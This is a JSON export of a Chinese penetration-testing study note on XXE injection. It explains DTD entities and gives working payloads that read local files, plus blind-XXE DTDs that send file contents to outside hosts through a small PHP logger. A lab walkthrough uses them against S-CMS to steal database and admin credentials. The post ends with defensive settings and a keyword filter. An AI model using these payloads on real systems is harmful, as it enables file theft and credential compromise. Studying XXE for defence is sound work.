{"id":351,"date":"2021-12-31T22:45:40","date_gmt":"2021-12-31T14:45:40","guid":{"rendered":"https:\/\/www.langsasec.cn\/?p=351"},"modified":"2022-11-14T22:36:50","modified_gmt":"2022-11-14T14:36:50","slug":"xxe","status":"publish","type":"post","link":"https:\/\/blog.langsasec.cn\/index.php\/2021\/12\/31\/xxe\/","title":{"rendered":"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165"},"content":{"rendered":"<h3><span class=\"ez-toc-section\" id=\"%e4%bb%80%e4%b9%88%e6%98%afxxe\"><\/span>\u4ec0\u4e48\u662fXXE<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<h4><span class=\"ez-toc-section\" id=\"%e6%a6%82%e8%bf%b0\"><\/span>\u6982\u8ff0<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>XXE\uff1aXML External Entity \u5373XML\u5916\u90e8\u5b9e\u4f53\u3002<\/p>\n<p><strong>\u653b\u51fb\u8005\u901a\u8fc7\u5411\u670d\u52a1\u5668\u6ce8\u5165\u6307\u5b9a\u7684xml\u5b9e\u4f53\u5185\u5bb9,\u4ece\u800c\u8ba9\u670d\u52a1\u5668\u6309\u7167\u6307\u5b9a\u7684\u914d\u7f6e\u8fdb\u884c\u6267\u884c\u3002<\/strong><br \/>\n<strong>\u4e5f\u5c31\u662f\u8bf4\u670d\u52a1\u7aef\u63a5\u6536\u548c\u89e3\u6790\u4e86\u6765\u81ea\u7528\u6237\u7aef\u7684xml\u6570\u636e,\u800c\u53c8\u6ca1\u6709\u505a\u4e25\u683c\u7684\u5b89\u5168\u63a7\u5236,\u4ece\u800c\u5bfc\u81f4xml\u5916\u90e8\u5b9e\u4f53\u6ce8\u5165\u3002<\/strong><\/p>\n<h4><span class=\"ez-toc-section\" id=\"%e7%8e%b0%e5%86%b5\"><\/span>\u73b0\u51b5<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>\u73b0\u5728\u5f88\u591a\u8bed\u8a00\u91cc\u9762\u5bf9\u5e94\u7684\u89e3\u6790xml\u7684\u51fd\u6570\u9ed8\u8ba4\u662f\u7981\u6b62\u89e3\u6790\u5916\u90e8\u5b9e\u4f53\u5185\u5bb9\u7684,\u4ece\u800c\u4e5f\u5c31\u76f4\u63a5\u907f\u514d\u4e86\u8fd9\u4e2a\u6f0f\u6d1e\u3002<br \/>\n\u4ee5PHP\u4e3a\u4f8b,\u5728PHP\u91cc\u9762\u89e3\u6790xml\u7528\u7684\u662flibxml,\u5176\u5728\u22652.9.0\u7684\u7248\u672c\u4e2d,\u9ed8\u8ba4\u662f\u7981\u6b62\u89e3\u6790xml\u5916\u90e8\u5b9e\u4f53\u5185\u5bb9\u7684\u3002<\/p>\n<h3><span class=\"ez-toc-section\" 
id=\"%e4%bb%80%e4%b9%88%e6%98%afxml\"><\/span>\u4ec0\u4e48\u662fXML<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ul>\n<li>XML \u6307\u53ef\u6269\u5c55\u6807\u8bb0\u8bed\u8a00\uff08EXtensible Markup Language\uff09<\/li>\n<li>XML \u662f\u4e00\u79cd\u6807\u8bb0\u8bed\u8a00\uff0c\u5f88\u7c7b\u4f3c HTML<\/li>\n<li>XML \u7684\u8bbe\u8ba1\u5b97\u65e8\u662f\u4f20\u8f93\u6570\u636e\uff0c\u800c\u975e\u663e\u793a\u6570\u636e<\/li>\n<li>XML \u6807\u7b7e\u6ca1\u6709\u88ab\u9884\u5b9a\u4e49\u3002\u60a8\u9700\u8981\u81ea\u884c\u5b9a\u4e49\u6807\u7b7e\u3002<\/li>\n<li>XML \u88ab\u8bbe\u8ba1\u4e3a\u5177\u6709\u81ea\u6211\u63cf\u8ff0\u6027\u3002<\/li>\n<li>XML \u662f W3C \u7684\u63a8\u8350\u6807\u51c6<\/li>\n<\/ul>\n<h3><span class=\"ez-toc-section\" id=\"dtd%e5%ad%a6%e4%b9%a0\"><\/span>DTD\u5b66\u4e60<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><strong>\u6587\u6863\u7c7b\u578b\u5b9a\u4e49\uff08DTD\uff09\u53ef\u5b9a\u4e49\u5408\u6cd5\u7684XML\u6587\u6863\u6784\u5efa\u6a21\u5757\u3002\u5b83\u4f7f\u7528\u4e00\u7cfb\u5217\u5408\u6cd5\u7684\u5143\u7d20\u6765\u5b9a\u4e49\u6587\u6863\u7684\u7ed3\u6784\u3002<\/strong><\/p>\n<p><strong>DTD \u53ef\u88ab\u6210\u884c\u5730\u58f0\u660e\u4e8e XML \u6587\u6863\u4e2d\uff0c\u4e5f\u53ef\u4f5c\u4e3a\u4e00\u4e2a\u5916\u90e8\u5f15\u7528\u3002<\/strong><\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">\u5f15\u7528\u65b9\u5f0f\uff1a\n\n1.DTD \u5185\u90e8\u58f0\u660e\n&lt;!DOCTYPE \u6839\u5143\u7d20 [\u5143\u7d20\u58f0\u660e]&gt;\n\n2.DTD \u5916\u90e8\u5f15\u7528\n&lt;!DOCTYPE \u6839\u5143\u7d20\u540d\u79f0 SYSTEM \u201c\u5916\u90e8DTD\u7684URI\u201d&gt;\n\n3.\u5f15\u7528\u516c\u5171DTD\n&lt;!DOCTYPE \u6839\u5143\u7d20\u540d\u79f0 PUBLIC \u201cDTD\u6807\u8bc6\u540d\u201d \u201c\u516c\u7528DTD\u7684URI\u201d&gt;<\/code><\/pre>\n<p>\u53c2\u8003\uff1a<a 
href=\"https:\/\/www.w3school.com.cn\/dtd\/dtd_intro.asp\">https:\/\/www.w3school.com.cn\/dtd\/dtd_intro.asp<\/a><\/p>\n<p><em>\u5b9a\u4e49\u5b9e\u4f53\u5fc5\u987b\u5199\u5728DTD\u90e8\u5206<\/em><\/p>\n<h4><span class=\"ez-toc-section\" id=\"%e7%89%b9%e7%82%b9\"><\/span>\u7279\u70b9<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<ol>\n<li>XML\u4ec5\u4ec5\u662f\u7eaf\u6587\u672c\uff0c\u4ed6\u4e0d\u4f1a\u505a\u4efb\u4f55\u4e8b\u60c5\u3002<\/li>\n<li>XML\u53ef\u4ee5\u81ea\u5df1\u53d1\u660e\u6807\u7b7e\uff08\u5141\u8bb8\u5b9a\u4e49\u81ea\u5df1\u7684\u6807\u7b7e\u548c\u6587\u6863\u7ed3\u6784\uff09<\/li>\n<li>XML \u662f\u5404\u79cd\u5e94\u7528\u7a0b\u5e8f\u4e4b\u95f4\u8fdb\u884c\u6570\u636e\u4f20\u8f93\u7684\u6700\u5e38\u7528\u7684\u5de5\u5177\uff0c\u5e76\u4e14\u5728\u4fe1\u606f\u5b58\u50a8\u548c\u63cf\u8ff0\u9886\u57df\u53d8\u5f97\u8d8a\u6765\u8d8a\u6d41\u884c\u3002<\/li>\n<\/ol>\n<h4><span class=\"ez-toc-section\" id=\"xxe%e5%8e%9f%e7%90%86\"><\/span>XXE\u539f\u7406<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>\u4ee5PHP\u4e3a\u4f8b<\/p>\n<p>php\u4e2d\u5b58\u5728\u4e00\u4e2a\u53eb\u505asimplexml_load_string\u7684\u51fd\u6570\uff08\u7528\u6765\u5904\u7406XML\uff09\uff0c\u8fd9\u4e2a\u51fd\u6570\u662f\u5c06XML\u8f6c\u5316\u4e3a\u5bf9\u8c61\u3002<br \/>\n\u5b9e\u4f8b\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">&lt;?php\n$test = &#039;&lt;!DOCTYPE scan [&lt;!ENTITY test SYSTEM &quot;file:\/\/\/c:\/1.txt&quot;&gt;]&gt;&lt;scan&gt;&amp;test;&lt;\/scan&gt;&#039;;\n$obj = simplexml_load_string($test, &#039;SimpleXMLElement&#039;, 
LIBXML_NOENT);\nprint_r($obj);\n?&gt;\n\n#\u53d8\u91cftest\u91cc\u9762\u662fXML\n#\u7528simplexml_load_string\u5c06\u5176\u8f6c\u5316\u4e3a\u5bf9\u8c61\uff0c\u7b2c\u4e00\u4e2a\u53c2\u6570\u662fxml\u8bed\u53e5\uff0cSimpleXMLElement\u662f\u8c03\u7528\u4e86SimpleXMLElement\u8fd9\u4e2a\u7c7b\uff0c\u7136\u540eLIBXML_NOENT\u662f\u66ff\u4ee3\u5b9e\u4f53\uff0c\u7136\u540e\u4ed6\u53bb\u6267\u884c\u4e86file\u534f\u8bae\u53bb\u8bfb\u53d6\u6211\u7684\u6587\u4ef6<\/code><\/pre>\n<h3><span class=\"ez-toc-section\" id=\"entity\"><\/span>ENTITY<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>XML\u4e2d\u7684\u5b9e\u4f53\u7c7b\u578b\uff0c\u4e00\u822c\u6709\u4e0b\u9762\u51e0\u79cd\uff1a\u547d\u540d\u5b9e\u4f53\uff08\u6216\u5185\u90e8\u5b9e\u4f53\uff09\u3001\u5916\u90e8\u666e\u901a\u5b9e\u4f53\u3001\u5916\u90e8\u53c2\u6570\u5b9e\u4f53\u3002\u9664\u5916\u90e8\u53c2\u6570\u5b9e\u4f53\u5916\uff0c\u5176\u5b83\u5b9e\u4f53\u90fd\u4ee5\u5b57\u7b26\uff08&amp;\uff09\u5f00\u59cb\uff0c\u4ee5\u5b57\u7b26\uff08;\uff09\u7ed3\u675f\u3002<br \/>\n<strong>1.\u5185\u90e8\u5b9e\u4f53<\/strong><br \/>\n\u4e00\u822c\u7528\u4e8e\u53d8\u91cf\u58f0\u660e<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">&lt;!ENTITY \u5b9e\u4f53\u540d\u79f0 &quot;\u5b9e\u4f53\u7684\u503c&quot;&gt;<\/code><\/pre>\n<p>\u5982\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;\n&lt;!DOCTYPE root [\n    &lt;!ENTITY x &quot;Hello&quot;&gt;\n    &lt;!ENTITY y &quot;World!&quot;&gt;\n]&gt;\n&lt;root&gt;&lt;x&gt;&amp;x;&lt;\/x&gt;&lt;y&gt;&amp;y;&lt;\/y&gt;&lt;\/root&gt;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/d9bcf84793b29d92dbaa119edea0d7c6.png\" alt=\"\u5c4f\u5e55\u5feb\u7167 2018-10-09 \u4e0b\u53485.49.34\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe\" \/><\/p>\n<p><strong>2.\u5916\u90e8\u666e\u901a\u5b9e\u4f53<\/strong><br 
\/>\n\u4e00\u822c\u7528\u4e8e\u52a0\u8f7d\u5916\u90e8\u6587\u4ef6\uff0c\u4e0d\u540c\u7a0b\u5e8f\u652f\u6301\u7684\u534f\u8bae\u4e0d\u4e00\u6837\u3002\u8fd9\u91cc\u6211\u4eec\u5c31\u53ef\u4ee5\u5229\u7528\u4e0d\u540c\u534f\u8bae\u6765\u8fbe\u5230\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\/\u5185\u7f51\u63a2\u6d4b\u7b49\u3002<br \/>\n<img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/b0be5a0bbad1879819b7095577c11737.png\" alt=\"\u5c4f\u5e55\u5feb\u7167 2018-10-09 \u4e0b\u53485.51.39\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe1\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">&lt;!ENTITY \u5b9e\u4f53\u540d\u79f0 SYSTEM &quot;URI\/URL&quot;&gt;<\/code><\/pre>\n<p>\u5982\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">php&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;\n&lt;!DOCTYPE root [\n    &lt;!ENTITY x &quot;First Param!&quot;&gt;\n    &lt;!ENTITY y &quot;Second Param!&quot;&gt;\n    &lt;!ENTITY xxe SYSTEM &quot;file:\/\/\/etc\/passwd&quot;&gt;\n]&gt;\n&lt;root&gt;&lt;x&gt;&amp;x;&lt;\/x&gt;&lt;y&gt;&amp;y;&lt;\/y&gt;&lt;xxe&gt;&amp;xxe;&lt;\/xxe&gt;&lt;\/root&gt;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/035eb4388b72a8d65adec7a0fd70f333.png\" alt=\"\u5c4f\u5e55\u5feb\u7167 2018-10-09 \u4e0b\u53486.00.55\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe2\" \/><\/p>\n<p><strong>3.\u5916\u90e8\u53c2\u6570\u5b9e\u4f53<\/strong><br 
\/>\n\u53c2\u6570\u5b9e\u4f53\u7528\u4e8eDTD\u548c\u6587\u6863\u7684\u5185\u90e8\u5b50\u96c6\u4e2d\u3002\u4e0e\u4e00\u822c\u5b9e\u4f53\u4e0d\u540c\uff0c\u662f\u4ee5\u5b57\u7b26\uff08%\uff09\u5f00\u59cb\uff0c\u4ee5\u5b57\u7b26\uff08;\uff09\u7ed3\u675f\u3002\u53ea\u6709\u5728DTD\u6587\u4ef6\u4e2d\u624d\u80fd\u5728\u53c2\u6570\u5b9e\u4f53\u58f0\u660e\u7684\u65f6\u5019\u5f15\u7528\u5176\u4ed6\u5b9e\u4f53\u3002\u9664\u4e86\u53ef\u4ee5\u5b8c\u6210\u6709\u56de\u663e\u7684\u60c5\u51b5\u3002\u8fd9\u91cc\u8fd8\u53ef\u4ee5\u7528\u4e8eBlind XXE\u653b\u51fb\u3002<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">&lt;!ENTITY % \u5b9e\u4f53\u540d\u79f0 &quot;\u5b9e\u4f53\u7684\u503c&quot;&gt;\n\u6216\u8005\n&lt;!ENTITY % \u5b9e\u4f53\u540d\u79f0 SYSTEM &quot;URI&quot;&gt;<\/code><\/pre>\n<p>\u5982\uff08Blind XXE\uff09\uff1a<br \/>\n\u7531\u4e8e\u8bed\u6cd5\u9650\u5236\u6240\u4ee5\u6211\u4eec\u9700\u8981\u5728\u5916\u90e8DTD\u4e2d\u63a5\u53d7\u5bf9\u5e94\u53c2\u6570<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;\n&lt;!DOCTYPE root [\n    &lt;!ENTITY % file SYSTEM &quot;file:\/\/\/Users\/ruilin\/test\/flag&quot;&gt;\n    &lt;!ENTITY % dtd SYSTEM &quot;http:\/\/rui0.cn\/test\/evil.dtd&quot;&gt;\n    %dtd;\n    %send;\n]&gt;<\/code><\/pre>\n<p>evil.dtd \u5185\u90e8\u7684%\u53f7\u8981\u8fdb\u884c\u5b9e\u4f53\u7f16\u7801\u6210&amp;#x25<br \/>\n\uff08\u8fd9\u91cc\u7684http:\/\/127.0.0.1:8888\u5927\u5bb6\u53ef\u4ee5\u7406\u89e3\u4e3a\u81ea\u5df1VPS\uff0c\u6211\u8fd9\u91cc\u4e3a\u4e86\u65b9\u4fbf\u76f4\u63a5\u4f7f\u7528\u672c\u673a\u63a5\u6536\u8bfb\u53d6\u5185\u5bb9\uff09<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">&lt;!ENTITY % all\n&quot;&lt;!ENTITY &amp;#x25; send SYSTEM &#039;http:\/\/127.0.0.1:8888\/?file=%file;&#039;&gt;&quot;\n>\n%all;<\/code><\/pre>\n<p><img decoding=\"async\" 
src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/254a9de7c05d5231d3ec75de63ab178d.png\" alt=\"\u5c4f\u5e55\u5feb\u7167 2018-10-09 \u4e0b\u53487.06.04\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe3\" \/><\/p>\n<h3><span class=\"ez-toc-section\" id=\"xxe%e5%8d%b1%e5%ae%b3\"><\/span>XXE\u5371\u5bb3<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>XXE\uff08XML\u5916\u90e8\u5b9e\u4f53\u6ce8\u5165\uff0cXML External Entity) \uff0c\u5728\u5e94\u7528\u7a0b\u5e8f<strong>\u89e3\u6790<\/strong>XML\u8f93\u5165\u65f6\uff0c\u5f53<strong>\u5141\u8bb8\u5f15\u7528\u5916\u90e8\u5b9e\u4f53<\/strong>\u65f6\uff0c\u53ef\u6784\u9020\u6076\u610f\u5185\u5bb9\uff0c\u5bfc\u81f4<\/p>\n<ul>\n<li>\n<p>\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6<\/p>\n<p>\u8bfb\u53d6\u6570\u636e\u65e0\u56de\u663e\uff0c\u53ef\u4ee5\u628a\u6570\u636e\u53d1\u9001\u5230\u8fdc\u7a0b\u670d\u52a1\u5668\u3002<\/p>\n<\/li>\n<li>\n<p>\u63a2\u6d4b\u5185\u7f51\u7aef\u53e3<\/p>\n<\/li>\n<li>\n<p>\u653b\u51fb\u5185\u7f51\u7f51\u7ad9<\/p>\n<\/li>\n<li>\n<p>\u53d1\u8d77DoS\u62d2\u7edd\u670d\u52a1\u653b\u51fb<\/p>\n<\/li>\n<li>\n<p>\u6267\u884c\u7cfb\u7edf\u547d\u4ee4<\/p>\n<\/li>\n<\/ul>\n<p>\u7b49\u3002Java\u4e2d\u7684XXE\u652f\u6301<code>sun.net.www.protocol<\/code> \u91cc\u7684\u6240\u6709\u534f\u8bae\uff1ahttp\uff0chttps\uff0cfile\uff0cftp\uff0cmailto\uff0cjar\uff0cnetdoc\u3002\u4e00\u822c\u5229\u7528file\u534f\u8bae\u8bfb\u53d6\u6587\u4ef6\uff0c\u5229\u7528http\u534f\u8bae\u63a2\u6d4b\u5185\u7f51\u3002<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%e8%af%bb%e5%8f%96%e4%bb%bb%e6%84%8f%e6%96%87%e4%bb%b6%e6%a1%88%e4%be%8b%e8%ae%b2%e8%a7%a3\"><\/span>\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6\u6848\u4f8b\u8bb2\u89e3<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">&lt;?php\n$test =&lt;&lt;&lt;EOF\n&lt;?xml version=&quot;1.0&quot;?&gt;\n&lt;!DOCTYPE ANY[\n&lt;!ENTITY % file SYSTEM 
&quot;php:\/\/filter\/read=convert.base64-encode\/resource=c:\/1.txt&quot;&gt;\n#\u5148\u8bfb\u53d6\u6211\u4eec\u60f3\u8981\u7684\u6587\u4ef6\uff0c\u7136\u540e\u4e3a\u4e86\u4f20\u8f93\u65b9\u4fbf\uff0c\u6211\u4eec\u5148\u6765\u4e2abase64\u7f16\u7801\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528php\u4f2a\u534f\u8bae\u8bfb\u53d6\u6587\u4ef6\uff08\u4ec5PHP\u652f\u6301\uff09\n\n#\u8c03\u7528\u4e00\u4e2a\u5916\u90e8xml \n#\u6bd4\u59821.xml\n    #1.xml###################\n&lt;!ENTITY % remote SYSTEM &quot;http:\/\/192.168.32.146\/xxe\/1.xml&quot;&gt; \n&lt;!ENTITY % all\n  &quot;&lt;!ENTITY &amp;#x25; send SYSTEM &#039;http:\/\/120.203.13.75:8123\/xxe\/2.php?id=%file;&#039;&gt;&quot;\n    #\u8bfb\u53d6\u51fa\u6765\u7684\u6587\u4ef6\u4f1a\u7528get\u4f20\u53c2\u7684\u65b9\u5f0f\u4f20\u53c2\u7ed92.php\n    &gt;\n    %all;\n    #1.xml###################\n\n#2.php\u5982\u4e0b  \n#&lt;?php file_put_contents(&quot;3.txt&quot;,$_GET[&quot;id&quot;],FILE_APPEND);?&gt;\n\n%remote;\n%send; \n]&gt;\nEOF;\n$obj = simplexml_load_string($test, &#039;SimpleXMLElement&#039;, LIBXML_NOENT);\n?&gt;\n<\/code><\/pre>\n<h3><span class=\"ez-toc-section\" id=\"xxe%e9%98%b2%e5%be%a1\"><\/span>XXE\u9632\u5fa1<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u65b9\u6848\u4e00\u3001\u4f7f\u7528\u5f00\u53d1\u8bed\u8a00\u63d0\u4f9b\u7684\u7981\u7528\u5916\u90e8\u5b9e\u4f53\u7684\u65b9\u6cd5<\/p>\n<p>PHP\uff1a<br \/>\nlibxml_disable_entity_loader(true);<br \/>\n（注意：该函数自 PHP 8.0 起已被弃用，libxml ≥2.9.0 默认不加载外部实体；上文示例之所以能读取文件，是因为传入了 LIBXML_NOENT 开启了实体替换，解析不可信 XML 时不要使用该选项。）<\/p>\n<p>JAVA:<br \/>\nDocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();<br \/>\ndbf.setExpandEntityReferences(false);<br \/>\n（注意：仅调用 setExpandEntityReferences(false) 不足以阻止 XXE，还应通过 dbf.setFeature(&quot;http:\/\/apache.org\/xml\/features\/disallow-doctype-decl&quot;, true) 直接禁止 DOCTYPE 声明。）<\/p>\n<p>Python\uff1a<br \/>\nfrom lxml import etree<br \/>\nxmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))<br \/>\n\u65b9\u6848\u4e8c\u3001\u8fc7\u6ee4\u7528\u6237\u63d0\u4ea4\u7684XML\u6570\u636e<br \/>\n\u5173\u952e\u8bcd\uff1a&lt;!DOCTYPE\u548c&lt;!ENTITY\uff0c\u6216\u8005\uff0cSYSTEM\u548cPUBLIC\u3002<br \/>\n（注意：关键词黑名单容易被大小写、编码等方式绕过，只能作为辅助手段；应优先采用方案一，在解析器层面禁用 DTD 和外部实体。）<\/p>\n<h3><span class=\"ez-toc-section\" 
id=\"%e9%9d%b6%e5%9c%ba%e6%bc%94%e7%a4%ba\"><\/span>\u9776\u573a\u6f14\u793a<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u76ee\u7684\uff1a\u901a\u8fc7XXE\u6765\u627e\u5230\u7ba1\u7406\u5458\u8d26\u6237\u5bc6\u7801<\/p>\n<p>1.\u9776\u573a\u4e3a\u5f00\u6e90CMS\uff1a\u95ea\u7075\u4f01\u4e1a\u5efa\u7ad9\uff08S-CMS\uff09<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/0c78b6d2aeecf2f2edf493047bf4bbab.png\" alt=\"image-20211231214735541\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe4\" \/><\/p>\n<p>2.\u53ef\u4ee5\u76f4\u63a5\u5728\u627e\u6e90\u7801\u6765\u5206\u6790<\/p>\n<p>\u5728weixin\u6587\u4ef6\u5939\u4e0b\u627e\u5230\u4e86simplexml_load_string\u51fd\u6570\u3002<\/p>\n<p>\u5f53$signature\u4e0d\u4e3a\u7a7a\u76f4\u63a5\u5c06POST\u63d0\u4ea4\u4e0a\u53bb\u7684\u6570\u636e\u653e\u5165\u4e86simplexml_load_string<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/f852b0631628af4888b005c889554e47.png\" alt=\"image-20211231221224900\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe5\" \/><\/p>\n<p>3.\u53ef\u60dc\u7684\u662f\u9875\u9762\u65e0\u663e\u793a\uff0c\u65e0\u6cd5\u6b63\u5e38\u7684\u4f7f\u7528XXE\u8f93\u51fa\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/0d13da6c93eaa03afd4e24dadcbc70a0.png\" alt=\"image-20211231221519942\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe6\" 
\/><\/p>\n<p>4.\u6211\u4eec\u9700\u8981\u5c1d\u8bd5\u53bb\u7528\u6ca1\u6709\u8f93\u51fa\u7684xxe\u653b\u51fb\u65b9\u6cd5\u3002<\/p>\n<p>\u5728\u67d0\u53f0\u516c\u7f51\u670d\u52a1\u5668\u4e0a\u7559\u4e0b1.xml,\u4ee5\u53ca2.php\u8fd8\u67093.txt\u7528\u6765\u63a5\u6536\u6570\u636e\u3002\uff08\u5177\u4f53\u539f\u7406\u89c1\u4e0a\u6587\u7684\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6\u6848\u4f8b\u8bb2\u89e3\uff09<\/p>\n<p>5.\u6211\u4eec\u53ea\u9700\u8981\u8bfb\u53d6\u6587\u4ef6\u7136\u540e\u5f15\u75281.xml\uff0c1.xml\u4f1a\u5c06\u8bfb\u53d6\u6587\u4ef6\u7684\u5185\u5bb9\u53d1\u9001\u7ed92.php\u30022.php\u7684\u6570\u636e\u4f1a\u50a8\u5b58\u52303.txt\u3002<\/p>\n<p>6.\u6211\u4eec\u9700\u8981\u7ba1\u7406\u5458\u8d26\u6237\uff0c\u6240\u4ee5\u5728CMS\u6e90\u7801\u627e\u5230\u4e86conn\/conn.php\u91cc\u6709\u6570\u636e\u5e93\u5bc6\u7801\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/ddd9653fe08ee8fc05a11c32ca5a4fc6.png\" alt=\"image-20211231222600124\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe7\" \/><\/p>\n<p>7.\u901a\u8fc7XXE\u6765\u83b7\u53d6\u4fe1\u606f<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/a3dcacf4d228bec90e40a600a1156181.png\" alt=\"image-20211231223020199\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe8\" \/><\/p>\n<p>8.\u57283.txt\u4e2d\u6536\u5230\u4e86\u4fe1\u606f\uff0c\u53bb\u89e3\u5bc6\u4e00\u4e0b<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/b7907ecd7d940f5769e6a51b8d4141be.png\" alt=\"image-20211231223128126\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe9\" \/><\/p>\n<p>9.\u62ff\u5230\u6570\u636e\u5e93\u8d26\u6237\u5bc6\u7801\uff0c\u53bb\u767b\u9646\u6570\u636e\u5e93<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/980804d001195efad36e670f28028446.png\" alt=\"image-20211231223748504\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe10\" 
\/><\/p>\n<p>10.\u62ff\u5230\u7ba1\u7406\u5458\u5bc6\u7801\uff0c\u6536\u5de5\uff01<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/a03ab78747154fc219ac55592d26f5f1.png\" alt=\"image-20211231223935275\" title=\"XXE&#8212;\u5b9e\u4f53\u6ce8\u5165\u63d2\u56fe11\" \/><\/p>\n<p>\u672c\u6587\u6db5\u76d6\u53c2\u8003\u94fe\u63a5\uff1a<\/p>\n<ul>\n<li><a href=\"http:\/\/rui0.cn\/archives\/993\">http:\/\/rui0.cn\/archives\/993<\/a><\/li>\n<li><a href=\"https:\/\/skysec.top\/2018\/08\/17\/%E6%B5%85%E6%9E%90xml%E5%8F%8A%E5%85%B6%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98\/\">https:\/\/skysec.top\/2018\/08\/17\/%E6%B5%85%E6%9E%90xml%E5%8F%8A%E5%85%B6%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98\/<\/a><\/li>\n<li><a href=\"https:\/\/blog.csdn.net\/qq_40491569\/article\/details\/83066200\">https:\/\/blog.csdn.net\/qq_40491569\/article\/details\/83066200<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>\u4ec0\u4e48\u662fXXE \u6982\u8ff0 XXE\uff1aXML External Entity \u5373XML\u5916\u90e8\u5b9e\u4f53\u3002 \u653b\u51fb\u8005\u901a\u8fc7\u5411\u670d\u52a1\u5668\u6ce8\u5165 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":927,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,19],"tags":[],"class_list":["post-351","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-webpt-studynote","category-penetration-test"],"_links":{"self":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/351","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/comments?post=351"}],"version-history":[{"count":8,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/351\/revisions"}],"predecessor-version":[{"id":1067,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/351\/revisions\/1067"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/media\/927"}],"wp:attachment":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/media?parent=351"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/categories?post=351"},{"taxonom